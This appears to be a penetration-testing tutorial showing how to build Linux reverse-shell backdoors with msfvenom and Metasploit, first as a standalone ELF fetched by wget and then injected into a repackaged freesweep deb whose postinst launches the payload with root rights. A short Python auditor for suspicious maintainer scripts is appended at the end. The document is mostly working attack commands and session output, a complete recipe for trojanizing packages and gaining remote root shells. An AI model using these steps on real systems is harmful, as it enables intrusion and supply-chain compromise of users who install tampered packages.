1.1 Backdoor attack examples
1.1.1 Building a Linux backdoor to obtain a shell
1.1.1.1 Building the Linux trojan
# msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.10.180 LPORT=4444 -b "\x00" -f elf -o /var/www/html/backdoor
1.1.1.2 Starting the listener on Kali
msf6 > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.10.180
LHOST => 192.168.10.180
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run
1.1.1.3 Running the trojan on Linux (CentOS)
[root@test ~]# wget http://192.168.10.180/backdoor
[root@test ~]# chmod +x backdoor
[root@test ~]# nohup ./backdoor &
1.1.1.4 Running commands once the backdoor has connected
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.10.80
OS           : CentOS 7.9.2009 (Linux 3.10.0-1160.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > ls
Listing: /root
==============

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100600/rw-------  13893  fil   2022-06-01 16:01:33 +0800  .bash_history
100644/rw-r--r--  18     fil   2013-12-29 10:26:31 +0800  .bash_logout
100644/rw-r--r--  176    fil   2013-12-29 10:26:31 +0800  .bash_profile
100644/rw-r--r--  176    fil   2013-12-29 10:26:31 +0800  .bashrc
100644/rw-r--r--  100    fil   2013-12-29 10:26:31 +0800  .cshrc
040755/rwxr-xr-x  37     dir   2021-12-14 10:44:29 +0800  .java
100600/rw-------  349    fil   2021-12-17 14:11:10 +0800  .mysql_history
040740/rwxr-----  19     dir   2021-11-16 10:41:42 +0800  .pki
040700/rwx------  25     dir   2021-12-14 13:23:17 +0800  .ssh
100644/rw-r--r--  129    fil   2013-12-29 10:26:31 +0800  .tcshrc
100600/rw-------  6982   fil   2022-05-12 10:36:28 +0800  .viminfo
100600/rw-------  1434   fil   2021-05-21 14:07:28 +0800  anaconda-ks.cfg
100755/rwxr-xr-x  295    fil   2022-06-07 17:05:55 +0800  backdoor
100644/rw-r--r--  27647  fil   2022-06-01 10:47:00 +0800  dnmap-0.6.zip
040755/rwxr-xr-x  199    dir   2022-06-01 15:02:43 +0800  dnmap-master
100644/rw-r--r--  23761  fil   2022-01-13 13:28:05 +0800  history.log
1.1.2 Injecting a backdoor into a deb package
1.1.2.1 Building the malicious deb package
- Download and unpack the deb package
# apt install freesweep --download-only
# mv /var/cache/apt/archives/freesweep_1.0.2-1_amd64.deb ./
# dpkg -x freesweep_1.0.2-1_amd64.deb free
- Generate the backdoor binary
# msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.10.180 LPORT=4444 -b "\x00" -f elf -o /root/free/usr/games/freesweep_sources
- Create the control files for repackaging the deb
# mkdir -p /root/free/DEBIAN
# cd /root/free/DEBIAN
# cat >> /root/free/DEBIAN/control <<'EOF'
Package: freesweep
Version: 1.0.1-1
Section: Games and Amusement
Priority: optional
Architecture: amd64
Maintainer: Ubuntu MOTU Developers ([email protected])
Description: a text-based minesweeper
 Freesweep is an implementation of the popular minesweeper game, where
 one tries to find all the mines without igniting any, based on hints given
 by the computer. Unlike most implementations of this game, Freesweep
 works in any visual text display - in Linux console, in an xterm, and in
 most text-based terminals currently in use.
EOF
# cat >> /root/free/DEBIAN/postinst <<'EOF'
#!/bin/bash
sudo chmod 2755 /usr/games/freesweep_sources
sudo /usr/games/freesweep_sources &
EOF
# chmod 755 /root/free/DEBIAN/postinst
- Rebuild the deb file
# dpkg-deb --build /root/free/
# ll -h free.deb
-rw-r--r-- 1 root root 55K Jun 8 08:54 free.deb
# If the build fails with: dpkg-deb: file `free.deb' contains ununderstood data member control.tar.xz , giving up
# then build it with this command instead: dpkg-deb -Z gzip --build ./free free.deb
# mv free.deb /var/www/html
# systemctl start apache2.service
1.1.2.2 Starting the msf listener
# msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.10.180
LHOST => 192.168.10.180
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > exploit -j
1.1.2.3 Installing the deb on the client
msfadmin@metasploitable:~$ wget http://192.168.10.180/free.deb
msfadmin@metasploitable:~$ sudo dpkg -i free.deb
1.1.2.4 Checking the connection and collecting server information
msf6 exploit(multi/handler) > sessions

msf6 exploit(multi/handler) > sessions -i 5
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/
background
Background session 5? [y/N] y
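What turns the repackaged freesweep into a backdoor is its postinst: it makes the dropped binary setgid and launches it in the background while dpkg runs as root, so reviewing maintainer scripts before installing a package from an untrusted source is the natural defensive check. The auditor below is an added example, not part of the original tutorial; the two sample scripts are constructed (the first is the postinst from 1.1.2.1), and audit_control_dir assumes you have first unpacked the control archive with `dpkg-deb -e pkg.deb <dir>`.

```python
import os
import re

# Constructed sample scripts: the postinst from the walkthrough above, and a
# benign one modelled on ordinary Debian maintainer scripts, for contrast.
SUSPICIOUS_POSTINST = """#!/bin/bash
sudo chmod 2755 /usr/games/freesweep_sources
sudo /usr/games/freesweep_sources &
"""
BENIGN_POSTINST = """#!/bin/sh
set -e
if [ "$1" = configure ]; then
    update-menus || true
fi
"""

# (reason, pattern) pairs; each flags behaviour that legitimate maintainer
# scripts almost never need.
CHECKS = [
    ("grants setuid/setgid bit", re.compile(r"\bchmod\s+(?:[2-7][0-7]{3}\b|\S*[ug]\+s)")),
    ("backgrounds a process during install", re.compile(r"(?<!&)&\s*$")),
    ("calls sudo from a script that already runs as root", re.compile(r"\bsudo\b")),
]

SCRIPT_NAMES = ("preinst", "postinst", "prerm", "postrm")


def audit_maintainer_script(text):
    """Return (line_no, reason, line) for every line that trips a check."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):  # skip shebang and comments
            continue
        for reason, pattern in CHECKS:
            if pattern.search(line):
                findings.append((n, reason, line))
    return findings


def audit_control_dir(path):
    """Audit each maintainer script in a directory unpacked by `dpkg-deb -e` (assumed layout)."""
    report = {}
    for name in SCRIPT_NAMES:
        script = os.path.join(path, name)
        if os.path.isfile(script):
            with open(script, encoding="utf-8", errors="replace") as fh:
                report[name] = audit_maintainer_script(fh.read())
    return report


if __name__ == "__main__":
    for label, text in (("suspicious", SUSPICIOUS_POSTINST), ("benign", BENIGN_POSTINST)):
        print(label, audit_maintainer_script(text))
```

Run it against the extracted DEBIAN directory of any package before `dpkg -i`; an empty report for every script is the expected result for a clean package.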
